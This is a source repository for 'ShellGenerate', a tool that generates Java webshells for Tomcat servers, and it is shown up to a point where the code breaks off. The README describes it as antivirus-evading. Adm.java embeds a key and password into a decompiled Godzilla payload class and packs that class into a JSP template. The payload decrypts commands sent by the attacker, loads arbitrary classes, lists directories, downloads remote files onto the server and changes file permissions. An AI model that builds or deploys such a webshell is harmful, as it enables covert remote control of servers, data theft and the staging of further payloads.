├── .idea ├── .gitignore ├── .name ├── artifacts │ └── ShellGenerate_jar.xml ├── compiler.xml ├── encodings.xml ├── jarRepositories.xml ├── libraries │ └── javassist.xml ├── misc.xml ├── uiDesigner.xml └── webContexts.xml ├── META-INF └── MANIFEST.MF ├── README.md ├── pom.xml ├── src └── main │ └── java │ ├── Adm.java │ ├── payload.java │ └── payload10.java └── templates ├── shell.jsp └── shell.jspx /.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Editor-based HTTP Client requests 5 | /httpRequests/ 6 | # Datasource local storage ignored files 7 | /dataSources/ 8 | /dataSources.local.xml 9 | -------------------------------------------------------------------------------- /.idea/.name: -------------------------------------------------------------------------------- 1 | GenShell -------------------------------------------------------------------------------- /.idea/artifacts/ShellGenerate_jar.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | $PROJECT_DIR$/out/artifacts/ShellGenerate_jar 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /.idea/compiler.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/jarRepositories.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 | 14 | 15 | 19 | 20 | -------------------------------------------------------------------------------- /.idea/libraries/javassist.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /.idea/uiDesigner.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | -------------------------------------------------------------------------------- /.idea/webContexts.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | -------------------------------------------------------------------------------- /META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: Adm 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ShellGenerate 2 | 3 | ## 简介 4 | 5 | 本工具是根据[那些牛马那些事儿](https://www.yuque.com/ni4n/blogs/wo2umt779c51re9v)中的本质马部分写的一个哥斯拉java类型webshell生成工具。 6 | 7 | ## 免责声明 8 | - 本工具根据互联网已有思路进行编写，故而不保证当前免杀效果。 9 | - 本工具仅用于研究与学习，请严格遵守当地法律法规，禁止使用本工具发起非法攻击等行为，基于非法攻击造成的后果由使用者负责。 10 | 11 | ## 使用说明 12 |
13 | 注意：需要将ShellGenerate.jar和templates目录放在同一文件夹下 14 | 15 |
16 | 17 | 完整参数 18 |
19 | 20 | ``` 21 | usage: ShellGenerate [-c ] [-f ] [-h] -k -p [-v ] 22 | -c,--class 指定落地的类名称，默认为payload.class，建议修改为其他名称 23 | -f,--file 指定生成的脚本名称，默认为shell.jsp 24 | -h,--help 显示使用帮助 25 | -k,--key 指定shell的key 26 | -p,--pass 指定shell的pass 27 | -v,--version 指定生成shell的版本，默认为tomcat10以下，设为1则适配tomcat10 28 | 29 | ``` 30 | 31 | 32 |
33 | 34 | 生成tomcat10以下的webshell，默认webshell文件名为shell.jsp，落地恶意类文件为payload.class 35 | 36 | java -jar .\ShellGenerate.jar -k [密钥] -p [密码] 37 | 38 | 指定落地恶意类文件，webshell为jsp文件 39 | 40 | java -jar .\ShellGenerate.jar -k [密钥] -p [密码] -c [落地的类名称] 41 | 42 | 指定生成适配tomcat10的webshell文件 43 | 44 | java -jar .\ShellGenerate.jar -k [密钥] -p [密码] -c [落地的类名称] -v 1 -------------------------------------------------------------------------------- /pom.xml: -------------------------------------------------------------------------------- 1 | 3 | 4.0.0 4 | com.exp 5 | GenShellGenerate 6 | jar 7 | 1.0-SNAPSHOT 8 | GenShellGenerate 9 | http://maven.apache.org 10 | 11 | 12 | commons-cli 13 | commons-cli 14 | 1.5.0 15 | 16 | 17 | jakarta.servlet 18 | jakarta.servlet-api 19 | 5.0.0 20 | provided 21 | 22 | 23 | javax.servlet 24 | javax.servlet-api 25 | 4.0.1 26 | provided 27 | 28 | 29 | org.javassist 30 | javassist 31 | 3.27.0-GA 32 | 33 | 34 | 35 | GenShellGenerate 36 | 37 | 38 | org.apache.maven.plugins 39 | maven-compiler-plugin 40 | 41 | 8 42 | 8 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /src/main/java/Adm.java: -------------------------------------------------------------------------------- 1 | import javassist.ClassPool; 2 | import javassist.CtClass; 3 | import javassist.CtField; 4 | import javassist.Modifier; 5 | import org.apache.commons.cli.*; 6 | 7 | import java.io.*; 8 | import java.nio.file.Files; 9 | import java.nio.file.Path; 10 | import java.nio.file.Paths; 11 | import java.security.MessageDigest; 12 | import java.security.NoSuchAlgorithmException; 13 | import java.text.ParseException; 14 | import java.util.Base64; 15 | 16 | public class Adm extends ClassLoader{ 17 | public static void main(String[] args) throws Exception { 18 | try{ 19 | CommandLine commandLine = cmd(args); 20 | String className = commandLine.getOptionValue("c"); 21 | if(className == null){className = "payload";} 22 | String key = commandLine.getOptionValue("k"); 23 | String pass = commandLine.getOptionValue("p"); 24 | String v = commandLine.getOptionValue("v"); 25 | String name = commandLine.getOptionValue("f"); 26 | if (name==null){name = "shell.jsp";} 27 | if (v == null) { 28 | insertCode(key, pass, className); 29 | } else { 30 | insertCode10(key, pass, className); 31 | } 32 | String code = generateCode(className); 33 | generateShell(name, className, code); 34 | }catch (NullPointerException e){ 35 | System.exit(0); 36 | } 37 | 38 | } 39 | private static CommandLine cmd(String[] args) throws ParseException{ 40 | Options options = new Options(); 41 | Option opt = new Option("h","help",false,"显示使用帮助"); 42 | opt.setRequired(false); 43 | options.addOption(opt); 44 | 45 | opt = new Option("k","key",true,"指定shell的key"); 46 | opt.setRequired(true); 47 | options.addOption(opt); 48 | 49 | opt = new Option("p","pass",true,"指定shell的pass"); 50 | opt.setRequired(true); 51 | options.addOption(opt); 52 | 53 | 54 | opt = new Option("f","file",true,"指定生成的脚本名称，默认为shell.jsp"); 55 | opt.setRequired(false); 56 | options.addOption(opt); 57 | 58 | opt = new Option("c","class",true,"指定落地的类名称，默认为payload.class，建议修改为其他名称"); 59 | opt.setRequired(false); 60 | options.addOption(opt); 61 | 62 | opt = new Option("v","version",true,"指定生成shell的版本，默认为tomcat10以下，设为1则适配tomcat10"); 63 | opt.setRequired(false); 64 | options.addOption(opt); 65 | HelpFormatter hf = new HelpFormatter(); 66 | hf.setWidth(110); 67 | CommandLine commandLine = null; 68 | CommandLineParser parser = new DefaultParser(); 69 | try { 70 | commandLine = parser.parse(options,args); 71 | if (commandLine.hasOption('h')){ 72 | hf.printHelp("ShellGenerate",options,true); 73 | } 74 | } catch (org.apache.commons.cli.ParseException e) { 75 | hf.printHelp("ShellGenerate",options,true); 76 | } 77 | return commandLine; 78 | } 79 | public static String byteArrayToHexPrefix(byte[] bytes, String prefix) { 80 | String strHex = ""; 81 | StringBuilder sb = new StringBuilder(); 82 | for (int n = 0; n < bytes.length; n++) { 83 | strHex = Integer.toHexString(bytes[n] & 0xFF); 84 | sb.append(prefix); 85 | sb.append((strHex.length() == 1) ? ("0" + strHex) : strHex); 86 | } 87 | return sb.toString().trim(); 88 | } 89 | public static String byteArrayToHex(byte[] bytes) { 90 | return byteArrayToHexPrefix(bytes, ""); 91 | } 92 | public static String md5(String s) { 93 | return byteArrayToHex(md5(s.getBytes())).substring(0,16); 94 | } 95 | public static byte[] md5(byte[] data) { 96 | byte[] ret = null; 97 | try { 98 | MessageDigest m = MessageDigest.getInstance("MD5"); 99 | m.update(data, 0, data.length); 100 | ret = m.digest(); 101 | } catch (NoSuchAlgorithmException e) { 102 | e.printStackTrace(); 103 | } 104 | return ret; 105 | } 106 | public static void insertCode(String xc,String pass,String className){ 107 | try { 108 | ClassPool cp = ClassPool.getDefault(); 109 | CtClass cc; 110 | cc = cp.get("payload"); 111 | cc.defrost(); 112 | for (CtField field : cc.getDeclaredFields()) { 113 | if (field.getName().equals("xc") || field.getName().equals("pass")) { 114 | cc.removeField(field); 115 | } 116 | } 117 | CtField ctField = new CtField(cp.get("java.lang.String"), "pass", cc); 118 | ctField.setModifiers(Modifier.PUBLIC); 119 | cc.addField(ctField, CtField.Initializer.constant(pass)); 120 | CtField ctField2 = new CtField(cp.get("java.lang.String"), "xc", cc); 121 | ctField2.setModifiers(Modifier.PUBLIC); 122 | cc.addField(ctField2, CtField.Initializer.constant(md5(xc))); 123 | cc.setName(className); 124 | cc.writeFile(String.valueOf(Paths.get(System.getProperty("user.dir"), "templates"))); 125 | }catch (Exception e){ 126 | e.printStackTrace(); 127 | } 128 | } 129 | public static void insertCode10(String xc,String pass,String className){ 130 | try { 131 | ClassPool cp = ClassPool.getDefault(); 132 | CtClass cc; 133 | cc = cp.get("payload10"); 134 | cc.defrost(); 135 | for (CtField field : cc.getDeclaredFields()) { 136 | if (field.getName().equals("xc") || field.getName().equals("pass")) { 137 | cc.removeField(field); 138 | } 139 | } 140 | CtField ctField = new CtField(cp.get("java.lang.String"), "pass", cc); 141 | ctField.setModifiers(Modifier.PUBLIC); 142 | cc.addField(ctField, CtField.Initializer.constant(pass)); 143 | CtField ctField2 = new CtField(cp.get("java.lang.String"), "xc", cc); 144 | ctField2.setModifiers(Modifier.PUBLIC); 145 | cc.addField(ctField2, CtField.Initializer.constant(md5(xc))); 146 | cc.setName(className); 147 | cc.writeFile(String.valueOf(Paths.get(System.getProperty("user.dir"), "templates"))); 148 | }catch (Exception e){ 149 | e.printStackTrace(); 150 | } 151 | } 152 | public static String generateCode(String className) throws IOException { 153 | Path path = Paths.get(System.getProperty("user.dir"),"templates",className + ".class"); 154 | byte[] bytes = Files.readAllBytes(path); 155 | String code = Base64.getEncoder().encodeToString(bytes); 156 | Files.delete(path); 157 | return code; 158 | } 159 | public static void generateShell(String name,String className,String code) throws IOException { 160 | Path path = null; 161 | if (name.indexOf("jspx")!=-1){ 162 | path = Paths.get(System.getProperty("user.dir"),"templates","shell.jspx"); 163 | } 164 | if ((name.indexOf("jsp")!=-1) && (name.lastIndexOf("jspx")==-1)){ 165 | path = Paths.get(System.getProperty("user.dir"),"templates","shell.jsp"); 166 | }else { 167 | path = Paths.get(System.getProperty("user.dir"),"templates","shell.jsp"); 168 | } 169 | File file = new File(path.toUri()); 170 | FileReader in = new FileReader(file); 171 | BufferedReader bufIn = new BufferedReader(in); 172 | CharArrayWriter tempStream = new CharArrayWriter(); 173 | String line = null; 174 | while ( (line = bufIn.readLine()) != null) { 175 | // 替换每行中, 符合条件的字符串 176 | line = line.replaceAll("shellCode", code); 177 | line = line.replaceAll("shellName",className); 178 | // 将该行写入内存 179 | tempStream.write(line); 180 | // 添加换行符 181 | tempStream.append(System.getProperty("line.separator")); 182 | } 183 | bufIn.close(); 184 | path = Paths.get(System.getProperty("user.dir"),name); 185 | file = new File(path.toUri()); 186 | FileWriter out = new FileWriter(file); 187 | tempStream.writeTo(out); 188 | out.close(); 189 | System.out.println(name+"已生成，路径为：" + path); 190 | } 191 | } 192 | -------------------------------------------------------------------------------- /src/main/java/payload.java: -------------------------------------------------------------------------------- 1 | import javax.imageio.ImageIO; 2 | import javax.servlet.ServletRequest; 3 | import javax.servlet.ServletResponse; 4 | import java.awt.*; 5 | import java.awt.image.BufferedImage; 6 | import java.io.*; 7 | import java.lang.reflect.Field; 8 | import java.lang.reflect.Method; 9 | import java.net.InetAddress; 10 | import java.net.NetworkInterface; 11 | import java.net.URL; 12 | import java.nio.file.Files; 13 | import java.nio.file.LinkOption; 14 | import java.nio.file.Path; 15 | import java.nio.file.Paths; 16 | import java.nio.file.attribute.BasicFileAttributeView; 17 | import java.nio.file.attribute.FileTime; 18 | import java.sql.*; 19 | import java.text.SimpleDateFormat; 20 | import java.util.Date; 21 | import java.util.List; 22 | import java.util.*; 23 | import java.util.zip.GZIPInputStream; 24 | import java.util.zip.GZIPOutputStream; 25 | 26 | // 27 | // Decompiled by Procyon v0.5.36 28 | // 29 | 30 | public class payload extends ClassLoader 31 | { 32 | public static final char[] toBase64; 33 | HashMap parameterMap; 34 | HashMap sessionMap; 35 | Object servletContext; 36 | Object servletRequest; 37 | Object servletResponse; 38 | Object httpSession; 39 | byte[] requestData; 40 | ByteArrayOutputStream outputStream; 41 | static /* synthetic */ Class class$0; 42 | static /* synthetic */ Class class$1; 43 | static /* synthetic */ Class class$2; 44 | static /* synthetic */ Class class$3; 45 | static /* synthetic */ Class class$4; 46 | static /* synthetic */ Class class$5; 47 | static /* synthetic */ Class class$6; 48 | static /* synthetic */ Class class$7; 49 | static /* synthetic */ Class class$8; 50 | static /* synthetic */ Class class$9; 51 | static /* synthetic */ Class class$10; 52 | String xc;//密钥 53 | String pass;//密码 54 | String md5=md5(pass+xc); 55 | static { 56 | toBase64 = new char[] { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '+', '/' }; 57 | } 58 | 59 | 60 | 61 | public payload() { 62 | this.parameterMap = new HashMap(); 63 | } 64 | 65 | public payload(final ClassLoader loader) { 66 | super(loader); 67 | this.parameterMap = new HashMap(); 68 | } 69 | 70 | public static String md5(String s) { 71 | String ret = null; 72 | try { 73 | java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5"); 74 | m.update(s.getBytes(), 0, s.length()); 75 | ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase(); 76 | }catch (Exception e) {} 77 | return ret; 78 | } 79 | public byte[] x(byte[] s,boolean m,String xc){ //字节码进行AES加密 80 | try{ 81 | javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES"); 82 | c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES")); 83 | return c.doFinal(s); 84 | } 85 | catch (Exception e){return null; } 86 | } 87 | public Class g(final byte[] b) { 88 | return super.defineClass(b, 0, b.length); 89 | } 90 | 91 | public byte[] run() { 92 | try { 93 | final String className = this.get("evalClassName"); 94 | final String methodName = this.get("methodName"); 95 | if (methodName == null) { 96 | return "method is null".getBytes(); 97 | } 98 | if (className == null) { 99 | final Method method = this.getClass().getMethod(methodName, (Class[])null); 100 | final Class returnType = method.getReturnType(); 101 | Class class$0; 102 | if ((class$0 = payload.class$0) == null) { 103 | try { 104 | class$0 = (payload.class$0 = Class.forName("[B")); 105 | } 106 | catch (ClassNotFoundException ex) { 107 | throw new NoClassDefFoundError(ex.getMessage()); 108 | } 109 | } 110 | if (returnType.isAssignableFrom(class$0)) { 111 | return (byte[])method.invoke(this, (Object[])null); 112 | } 113 | return "this method returnType not is byte[]".getBytes(); 114 | } 115 | else { 116 | final Class evalClass = (Class) this.sessionMap.get(className); 117 | if (evalClass == null) { 118 | return "evalClass is null".getBytes(); 119 | } 120 | final Object object = evalClass.newInstance(); 121 | object.equals(this.parameterMap); 122 | object.toString(); 123 | final Object resultObject = this.parameterMap.get("result"); 124 | if (resultObject == null) { 125 | return new byte[0]; 126 | } 127 | Class class$2; 128 | if ((class$2 = payload.class$0) == null) { 129 | try { 130 | class$2 = (payload.class$0 = Class.forName("[B")); 131 | } 132 | catch (ClassNotFoundException ex2) { 133 | throw new NoClassDefFoundError(ex2.getMessage()); 134 | } 135 | } 136 | if (class$2.isAssignableFrom(resultObject.getClass())) { 137 | return (byte[])resultObject; 138 | } 139 | return "return typeErr".getBytes(); 140 | } 141 | } 142 | catch (Throwable e) { 143 | final ByteArrayOutputStream stream = new ByteArrayOutputStream(); 144 | final PrintStream printStream = new PrintStream(stream); 145 | e.printStackTrace(printStream); 146 | printStream.flush(); 147 | printStream.close(); 148 | return stream.toByteArray(); 149 | } 150 | } 151 | 152 | public void formatParameter() { 153 | this.parameterMap.clear(); 154 | this.parameterMap.put("sessionMap", this.sessionMap); 155 | this.parameterMap.put("servletRequest", this.servletRequest); 156 | this.parameterMap.put("servletContext", this.servletContext); 157 | this.parameterMap.put("httpSession", this.httpSession); 158 | final byte[] parameterByte = this.requestData; 159 | final ByteArrayInputStream tStream = new ByteArrayInputStream(parameterByte); 160 | final ByteArrayOutputStream tp = new ByteArrayOutputStream(); 161 | String key = null; 162 | final byte[] lenB = new byte[4]; 163 | byte[] data = null; 164 | try { 165 | final GZIPInputStream inputStream = new GZIPInputStream(tStream); 166 | while (true) { 167 | final byte t = (byte)inputStream.read(); 168 | if (t == -1) { 169 | break; 170 | } 171 | if (t == 2) { 172 | key = new String(tp.toByteArray()); 173 | inputStream.read(lenB); 174 | final int len = bytesToInt(lenB); 175 | data = new byte[len]; 176 | int readOneLen = 0; 177 | while ((readOneLen += inputStream.read(data, readOneLen, data.length - readOneLen)) < data.length) {} 178 | this.parameterMap.put(key, data); 179 | tp.reset(); 180 | } 181 | else { 182 | tp.write(t); 183 | } 184 | } 185 | tp.close(); 186 | tStream.close(); 187 | inputStream.close(); 188 | } 189 | catch (Exception ex) {} 190 | } 191 | 192 | public boolean equals(Object obj) { 193 | handle(obj); 194 | ServletRequest request = (ServletRequest) this.servletRequest; 195 | ServletResponse response = (ServletResponse) this.servletResponse; 196 | try{ 197 | byte[] data = base64Decode(request.getParameter(this.pass)); 198 | data = x(data,false,xc); 199 | java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream(); 200 | handle(arrOut); 201 | this.noLog(this.servletContext); 202 | handle(data); 203 | this.noLog(this.servletContext); 204 | response.getWriter().write(this.md5.substring(0,16)); 205 | this.toString(); 206 | response.getWriter().write(base64Encode(x(arrOut.toByteArray(),true,xc))); 207 | response.getWriter().write(this.md5.substring(16)); 208 | }catch (Throwable throwable){} 209 | return true; 210 | } 211 | 212 | public boolean handle( Object obj) { 213 | if (obj == null) { 214 | return false; 215 | } 216 | Class class$1; 217 | if ((class$1 = payload.class$1) == null) { 218 | try { 219 | class$1 = (payload.class$1 = Class.forName("java.io.ByteArrayOutputStream")); 220 | } 221 | catch (ClassNotFoundException ex) { 222 | throw new NoClassDefFoundError(ex.getMessage()); 223 | } 224 | } 225 | if (class$1.isAssignableFrom(obj.getClass())) { 226 | this.outputStream = (ByteArrayOutputStream)obj; 227 | return false; 228 | } 229 | if (this.supportClass(obj, "%s.servlet.http.HttpServletRequest")) { 230 | this.servletRequest = obj; 231 | } 232 | else if (this.supportClass(obj, "%s.servlet.ServletRequest")) { 233 | this.servletRequest = obj; 234 | } 235 | else { 236 | Class class$2; 237 | if ((class$2 = payload.class$0) == null) { 238 | try { 239 | class$2 = (payload.class$0 = Class.forName("[B")); 240 | } 241 | catch (ClassNotFoundException ex2) { 242 | throw new NoClassDefFoundError(ex2.getMessage()); 243 | } 244 | } 245 | if (class$2.isAssignableFrom(obj.getClass())) { 246 | this.requestData = (byte[])obj; 247 | } 248 | else if (this.supportClass(obj, "%s.servlet.http.HttpSession")) { 249 | this.httpSession = obj; 250 | } 251 | } 252 | this.handlePayloadContext(obj); 253 | if (this.servletRequest != null && this.requestData == null) { 254 | final Object servletRequest = this.servletRequest; 255 | final String methodName = "getAttribute"; 256 | final Class[] parameterClass = { null }; 257 | final int n = 0; 258 | Class class$3; 259 | if ((class$3 = payload.class$2) == null) { 260 | try { 261 | class$3 = (payload.class$2 = Class.forName("java.lang.String")); 262 | } 263 | catch (ClassNotFoundException ex3) { 264 | throw new NoClassDefFoundError(ex3.getMessage()); 265 | } 266 | } 267 | parameterClass[n] = class$3; 268 | final Object retVObject = this.getMethodAndInvoke(servletRequest, methodName, parameterClass, new Object[] { "parameters" }); 269 | if (retVObject != null) { 270 | Class class$4; 271 | if ((class$4 = payload.class$0) == null) { 272 | try { 273 | class$4 = (payload.class$0 = Class.forName("[B")); 274 | } 275 | catch (ClassNotFoundException ex4) { 276 | throw new NoClassDefFoundError(ex4.getMessage()); 277 | } 278 | } 279 | if (class$4.isAssignableFrom(retVObject.getClass())) { 280 | this.requestData = (byte[])retVObject; 281 | } 282 | } 283 | } 284 | return true; 285 | } 286 | 287 | private void handlePayloadContext( Object obj) { 288 | try { 289 | if (Object[].class.isAssignableFrom(obj.getClass())){ 290 | Object[] objects = (Object[]) obj; 291 | this.servletRequest = objects[0]; 292 | this.servletContext = getMethodAndInvoke(objects[0],"getServletContext",null,null); 293 | this.servletResponse = objects[1]; 294 | this.httpSession = objects[2]; 295 | } else if (obj.getClass().getName().indexOf("PageContext")>=0) { 296 | final Method getRequestMethod = this.getMethodByClass(obj.getClass(), "getRequest", null); 297 | final Method getServletContextMethod = this.getMethodByClass(obj.getClass(), "getServletContext", null); 298 | final Method getSessionMethod = this.getMethodByClass(obj.getClass(), "getSession", null); 299 | final Method getResponseMethod = this.getMethodByClass(obj.getClass(), "getResponse", null); 300 | if (getRequestMethod != null && this.servletRequest == null) { 301 | this.servletRequest = getRequestMethod.invoke(obj, (Object[])null); 302 | } 303 | if (getServletContextMethod != null && this.servletContext == null) { 304 | this.servletContext = getServletContextMethod.invoke(obj, (Object[])null); 305 | } 306 | if (getSessionMethod != null && this.httpSession == null) { 307 | this.httpSession = getSessionMethod.invoke(obj, (Object[])null); 308 | } 309 | if (getResponseMethod != null && this.servletResponse == null){ 310 | this.servletResponse = getResponseMethod.invoke(obj,(Object[])null); 311 | } 312 | }else { 313 | Map objectMap = (Map) obj; 314 | this.servletRequest = objectMap.get("request"); 315 | this.servletContext = getMethodAndInvoke(this.servletRequest,"getServletContext",null,null); 316 | this.servletResponse = objectMap.get("response"); 317 | this.httpSession = objectMap.get("session"); 318 | } 319 | } 320 | catch (Exception ex) {} 321 | } 322 | 323 | private boolean supportClass( Object obj, String classNameString) { 324 | if (obj == null) { 325 | return false; 326 | } 327 | boolean ret = false; 328 | Class c = null; 329 | try { 330 | if ((c = getClass(String.format(classNameString, "javax"))) != null) { 331 | ret = c.isAssignableFrom(obj.getClass()); 332 | } 333 | if (!ret && (c = getClass(String.format(classNameString, "jakarta"))) != null) { 334 | ret = c.isAssignableFrom(obj.getClass()); 335 | } 336 | } 337 | catch (Exception ex) {} 338 | return ret; 339 | } 340 | 341 | public String toString() { 342 | String returnString = null; 343 | if (this.outputStream != null) { 344 | try { 345 | this.initSessionMap(); 346 | final GZIPOutputStream gzipOutputStream = new GZIPOutputStream(this.outputStream); 347 | this.formatParameter(); 348 | if (this.parameterMap.get("evalNextData") != null) { 349 | this.run(); 350 | this.requestData = (byte[]) this.parameterMap.get("evalNextData"); 351 | this.formatParameter(); 352 | } 353 | gzipOutputStream.write(this.run()); 354 | gzipOutputStream.close(); 355 | this.outputStream.close(); 356 | } 357 | catch (Throwable e) { 358 | returnString = e.getMessage(); 359 | } 360 | } 361 | else { 362 | returnString = "outputStream is null"; 363 | } 364 | this.httpSession = null; 365 | this.outputStream = null; 366 | this.parameterMap = null; 367 | this.requestData = null; 368 | this.servletContext = null; 369 | this.servletRequest = null; 370 | this.sessionMap = null; 371 | return returnString; 372 | } 373 | 374 | private void initSessionMap() { 375 | if (this.sessionMap == null) { 376 | if (this.getSessionAttribute("sessionMap") != null) { 377 | try { 378 | this.sessionMap = (HashMap)this.getSessionAttribute("sessionMap"); 379 | } 380 | catch (Exception ex) {} 381 | } 382 | else { 383 | this.sessionMap = new HashMap(); 384 | try { 385 | this.setSessionAttribute("sessionMap", this.sessionMap); 386 | } 387 | catch (Exception ex2) {} 388 | } 389 | if (this.sessionMap == null) { 390 | this.sessionMap = new HashMap(); 391 | } 392 | } 393 | } 394 | 395 | public String get( String key) { 396 | try { 397 | return new String((byte[]) this.parameterMap.get(key)); 398 | } 399 | catch (Exception e) { 400 | return null; 401 | } 402 | } 403 | 404 | public byte[] getByteArray( String key) { 405 | try { 406 | return (byte[]) this.parameterMap.get(key); 407 | } 408 | catch (Exception e) { 409 | return null; 410 | } 411 | } 412 | 413 | public byte[] test() { 414 | return "ok".getBytes(); 415 | } 416 | 417 | public byte[] getFile() { 418 | String dirName = this.get("dirName"); 419 | if (dirName != null) { 420 | dirName = dirName.trim(); 421 | String buffer = new String(); 422 | try { 423 | final String currentDir = new File(dirName).getAbsoluteFile() + "/"; 424 | final File currentDirFile = new File(currentDir); 425 | if (!currentDirFile.exists()) { 426 | return "dir does not exist".getBytes(); 427 | } 428 | final File[] files = currentDirFile.listFiles(); 429 | buffer = String.valueOf(buffer) + "ok"; 430 | buffer = String.valueOf(buffer) + "\n"; 431 | buffer = String.valueOf(buffer) + currentDir; 432 | buffer = String.valueOf(buffer) + "\n"; 433 | if (files != null) { 434 | for (int i = 0; i < files.length; ++i) { 435 | final File file = files[i]; 436 | try { 437 | buffer = String.valueOf(buffer) + file.getName(); 438 | buffer = String.valueOf(buffer) + "\t"; 439 | buffer = String.valueOf(buffer) + (file.isDirectory() ? "0" : "1"); 440 | buffer = String.valueOf(buffer) + "\t"; 441 | buffer = String.valueOf(buffer) + new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date(file.lastModified())); 442 | buffer = String.valueOf(buffer) + "\t"; 443 | buffer = String.valueOf(buffer) + Integer.toString((int)file.length()); 444 | buffer = String.valueOf(buffer) + "\t"; 445 | final StringBuffer append = new StringBuffer(String.valueOf(file.canRead() ? "R" : "")).append(file.canWrite() ? "W" : ""); 446 | Class class$3; 447 | if ((class$3 = payload.class$3) == null) { 448 | try { 449 | class$3 = (payload.class$3 = Class.forName("java.io.File")); 450 | } 451 | catch (ClassNotFoundException ex) { 452 | throw new NoClassDefFoundError(ex.getMessage()); 453 | } 454 | } 455 | final String fileState = append.append((this.getMethodByClass(class$3, "canExecute", null) != null) ? (file.canExecute() ? "X" : "") : "").toString(); 456 | buffer = String.valueOf(buffer) + ((fileState == null || fileState.trim().length() == 0) ? "F" : fileState); 457 | buffer = String.valueOf(buffer) + "\n"; 458 | } 459 | catch (Exception e) { 460 | buffer = String.valueOf(buffer) + e.getMessage(); 461 | buffer = String.valueOf(buffer) + "\n"; 462 | } 463 | } 464 | } 465 | } 466 | catch (Exception e2) { 467 | return String.format("dir does not exist errMsg:%s", e2.getMessage()).getBytes(); 468 | } 469 | return buffer.getBytes(); 470 | } 471 | return "No parameter dirName".getBytes(); 472 | } 473 | 474 | public String listFileRoot() { 475 | final File[] files = File.listRoots(); 476 | String buffer = new String(); 477 | for (int i = 0; i < files.length; ++i) { 478 | buffer = String.valueOf(buffer) + files[i].getPath(); 479 | buffer = String.valueOf(buffer) + ";"; 480 | } 481 | return buffer; 482 | } 483 | 484 | public byte[] fileRemoteDown() { 485 | final String url = this.get("url"); 486 | final String saveFile = this.get("saveFile"); 487 | if (url != null && saveFile != null) { 488 | FileOutputStream outputStream = null; 489 | try { 490 | final InputStream inputStream = new URL(url).openStream(); 491 | outputStream = new FileOutputStream(saveFile); 492 | final byte[] data = new byte[5120]; 493 | int readNum = -1; 494 | while ((readNum = inputStream.read(data)) != -1) { 495 | outputStream.write(data, 0, readNum); 496 | } 497 | outputStream.flush(); 498 | outputStream.close(); 499 | inputStream.close(); 500 | return "ok".getBytes(); 501 | } 502 | catch (Exception e2) { 503 | if (outputStream != null) { 504 | try { 505 | outputStream.close(); 506 | } 507 | catch (IOException e1) { 508 | return e1.getMessage().getBytes(); 509 | } 510 | } 511 | return String.format("%s : %s", e2.getClass().getName(), e2.getMessage()).getBytes(); 512 | } 513 | } 514 | return "url or saveFile is null".getBytes(); 515 | } 516 | 517 | public byte[] setFileAttr() { 518 | final String type = this.get("type"); 519 | final String attr = this.get("attr"); 520 | final String fileName = this.get("fileName"); 521 | String ret = "Null"; 522 | if (type != null && attr != null && fileName != null) { 523 | try { 524 | final File file = new File(fileName); 525 | if ("fileBasicAttr".equals(type)) { 526 | Class class$3; 527 | if ((class$3 = payload.class$3) == null) { 528 | try { 529 | class$3 = (payload.class$3 = Class.forName("java.io.File")); 530 | } 531 | catch (ClassNotFoundException ex) { 532 | throw new NoClassDefFoundError(ex.getMessage()); 533 | } 534 | } 535 | if (this.getMethodByClass(class$3, "setWritable", new Class[] { Boolean.TYPE }) != null) { 536 | if (attr.indexOf("R") != -1) { 537 | file.setReadable(true); 538 | } 539 | if (attr.indexOf("W") != -1) { 540 | file.setWritable(true); 541 | } 542 | if (attr.indexOf("X") != -1) { 543 | 